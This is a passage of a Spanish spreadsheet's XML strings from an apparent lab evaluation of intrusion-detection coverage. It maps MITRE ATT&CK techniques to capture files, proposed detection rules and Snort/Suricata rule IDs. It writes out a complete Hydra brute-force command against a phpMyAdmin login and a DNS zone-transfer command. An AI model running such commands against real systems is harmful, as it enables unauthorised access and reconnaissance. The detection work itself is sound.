      <t xml:space="preserve">, 2027261, 2022520, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101201</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2027250, 2101145, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010229, 2101016, 2100993, 2019526, 2101877, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2101129, 2101071, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027261</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2022520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101201, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027250, 2101145</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2010229, 2101016, 2100993, 2019526, 2101877, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2027261, 2022520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2101201</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2027250, 2101145, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010229</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101016, 2100993</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2019526, 2101877</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027263</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1434</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879,1218,845,1213,885,1206,882</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1231</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1543,1551,839,825,1016,1141,1606,993,886,1877</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>895,1852,1520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1521</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>835,849,896,1826</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>853,43290,887,50447,41742,33608,42289</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>59258</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2027261, 2022520,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2101201,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2027250, 2101145, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010229,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2101016, 2100993, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">019526, 2101877, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>027263, 1</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>34, 1</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>43</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>3, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>43, 15</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1520, 1521, 835,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">849, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>96, 1826, 853, 43</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">90, 887, 50447, 41742, 33608, 42289, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>9258,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101129, 2101071, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027261,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2022520,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2101201, 2009885, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027250,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2101288, 2100937, 2101662, 2101489, 2101145, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 50447, 41742, 33608, 42289, 59258, 2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101129, 2101071, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027261,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2022520,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2101201, 2009885, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027250,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2101288, 2100937, 2101662, 2101489, 2101145, 2010229, 2008330, 2000560, 2100884, 2101016, 2100993, 2010377, 2019526, 2101877, 2101852, 2027263, 1434, 1433, 1129, 1071, 1201, 2062, 43285, 1288, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 1213, 885, 1206, 882, 1231, 1543, 1551, 839, 825, 1016, 1141, 1606, 993, 886, 1877, 895, 1852, 1520, 1521, 835, 849, 896, 1826, 853, 43290, 887, 50447, 41742, 33608, 42289, 59258, 2049402</t>
    </r>
  </si>
  <si>
    <t>El diccionario utilizado comprueba 4614 rutas diferentes. Snort detecta el acceso e intento de acceso a diferentes rutas, lo que puede llegar a indicar un posible ataque de estas características pero no detectaría todas las rutas. Para el caso de FortiGate, tan sólo se detecta el intento concreto de acceder al fichero .htpasswd, lo cual sólo abarca una de las instancias</t>
  </si>
  <si>
    <t xml:space="preserve">   </t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>Transferencia de zona DNS</t>
  </si>
  <si>
    <t>T1596.001-DNS_Transfer_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte paquetes TCP dirigidos al puerto 53 que tengan los bytes "Question" igual a 1 y el resto a cero. Además, el campo "Type" debe tomar el valor "00 FC"</t>
  </si>
  <si>
    <t>Ejecución de comando para obtener informacion de la víctima (host -l javier.example.com IP)</t>
  </si>
  <si>
    <t>Manual [2] / 3.1.1.2</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.2</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100255, 255</t>
    </r>
  </si>
  <si>
    <t>2100255, 255</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Recogida de información de la víctima mediante ingeniería social</t>
  </si>
  <si>
    <t>SEToolKit</t>
  </si>
  <si>
    <t>T1598.003_Spearphishing_Link_[5].pcapng</t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos</t>
  </si>
  <si>
    <t>Servidor de correo mediante Postfix, Thunderbird, Bind, Dovecot</t>
  </si>
  <si>
    <t>Manual [5] / 3.5.1.1</t>
  </si>
  <si>
    <t>Manual [5]</t>
  </si>
  <si>
    <t>2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Recogida de cuentas de correo eléctronico y validación de las mismas</t>
  </si>
  <si>
    <t>theHarvester, bulk-email-verifier</t>
  </si>
  <si>
    <t>T1589.002-Gather_victim_identity_information_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un número elevado de intentos de conexión y mensajes ehlo SMTP procedentes de un mismo origen hacia un servidor, con diferentes destinatarios.</t>
  </si>
  <si>
    <t>Manual [4] / 3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.1</t>
  </si>
  <si>
    <t>Manual [4] / 4.1</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>TA0042</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Fuerza bruta para acceso a web</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>T1586.001-Compromise_Accounts_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte el envío de una contraseña sobre el cuerpo de una petición HTTP POST. </t>
  </si>
  <si>
    <t>Ataque de fuerza bruta a formulario de acceso a página web phpMyAdmin. Comando: hydra -l root -P /usr/share/john/password.lst 192.168.2.2 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&amp;pma_password=^PASS^:#1045 Cannot log in to the MySQL server"</t>
  </si>
  <si>
    <t>Manual [2] / 3.1.2.1</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.3</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 1826, 1852, 1877, 2062, 43285, 43290, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 1826, 1852, 1877, 2010229, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101877, 43285, 43290, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 17429, 1826, 1852, 1877, 2010229, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101877, 33608, 41742, 42289, 43285, 43290, 50447, 59258, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 17429, 1826, 1852, 1877, 2000560, 2002749, 2002752, 2008330, 2009749, 2009885, 2010229, 2010377, 2010706, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100884, 2100937, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101288, 2101489, 2101662, 2101852, 2101877, 33608, 41742, 42289, 43285, 43290, 50447, 59258, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 17429, 1826, 1852, 1877, 2000560, 2008330, 2009749, 2009885, 2010229, 2010377, 2010706, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100884, 2100937, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101288, 2101489, 2101662, 2101852, 2101877, 33608, 41742, 42289, 43285, 43290, 50447, 59258, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>Establish Accounts</t>
  </si>
  <si>
    <t>T1585</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Creación de cuentas de redes sociales</t>
  </si>
  <si>
    <t>Sitios web convencionales (Facebook, Github, Microsoft ...)</t>
  </si>
  <si>
    <t>T1585.001-Establish_social_accounts_[4].pcapng</t>
  </si>
  <si>
    <t>Siempre y cuando el origen sea la red a proteger, detección por anomalías que identifique un incipiente aumento de las peticiones a servidores de redes sociales.</t>
  </si>
  <si>
    <t>Manual [4] /  3.2</t>
  </si>
  <si>
    <t>Manual [4] / B.2</t>
  </si>
  <si>
    <t>Manual [4] / 4.2</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>DNS Server</t>
  </si>
  <si>
    <t>Envenenamiento de Caché DNS</t>
  </si>
  <si>
    <t>ettercap</t>
  </si>
  <si>
    <t>T1584-Cache_dns_[1].pcapng</t>
  </si>
  <si>
    <t>Una vez el servidor DNS se encuentra comprometido, no es posible determinar si las redirecciones basadas en una caché envenenada son maliciosas o no</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.1.1.5</t>
  </si>
  <si>
    <t>Manual [1] / E.16</t>
  </si>
  <si>
    <t>NO (no detectable por red)</t>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749</t>
  </si>
  <si>
    <t>2100469, 2100384</t>
  </si>
  <si>
    <t>Secuestro / Redireccionamiento DNS</t>
  </si>
  <si>
    <t>T1584-Secuestro_dns_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.1.1.4</t>
  </si>
  <si>
    <t>Manual [1] / E.15</t>
  </si>
  <si>
    <t>2100384,2100469,2002752,2002749</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t xml:space="preserve">Uso de Botnet </t>
  </si>
  <si>
    <t>Ares, Screenshot and key logging</t>
  </si>
  <si>
    <t>T1584.005-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>La detección debe centrarse en otras fases del ciclo de vida de un ataque, como Phishing, DDoS...</t>
  </si>
  <si>
    <t>Uso de Ares y screenshots y key logging    https://www.unb.ca/cic/datasets/ids-2018.html</t>
  </si>
  <si>
    <t>Dataset CIC-2018</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2049, 29456, 31136, 384, 385, 42340, 449, 566</t>
  </si>
  <si>
    <t xml:space="preserve">1413, 1417, 1448, 1917, 2001219, 2001972, 2003068, 2008578, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2049, 2100566, 2101413, 29456, 31136, 384, 385, 42340, 449, 566
</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2001219, 2001972, 2003068, 2008578, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2049, 2100566, 2101413, 23493, 28993, 29456, 31136, 384, 385, 4060, 42340, 44484, 44485, 44486, 44487, 44488, 44489, 449, 45941, 566</t>
  </si>
  <si>
    <t>1413, 1417, 1448, 1917, 2001117, 2001219, 2001972, 2002749, 2002752, 2003068, 2008578, 2009205, 2009206, 2009207, 2009208, 2009582, 2010935, 2010937, 2010939, 2011716, 2012296, 2013479, 2015856, 2023997, 2044666, 2049, 2100254, 2100384, 2100385, 2100449, 2100469, 2100486, 2100566, 2100615, 2100628, 2101413, 2101417, 2101917, 2102049, 23493, 28993, 29456, 31136, 384, 385, 4060, 42340, 44484, 44485, 44486, 44487, 44488, 44489, 449, 45941, 566</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>TA0001</t>
  </si>
  <si>
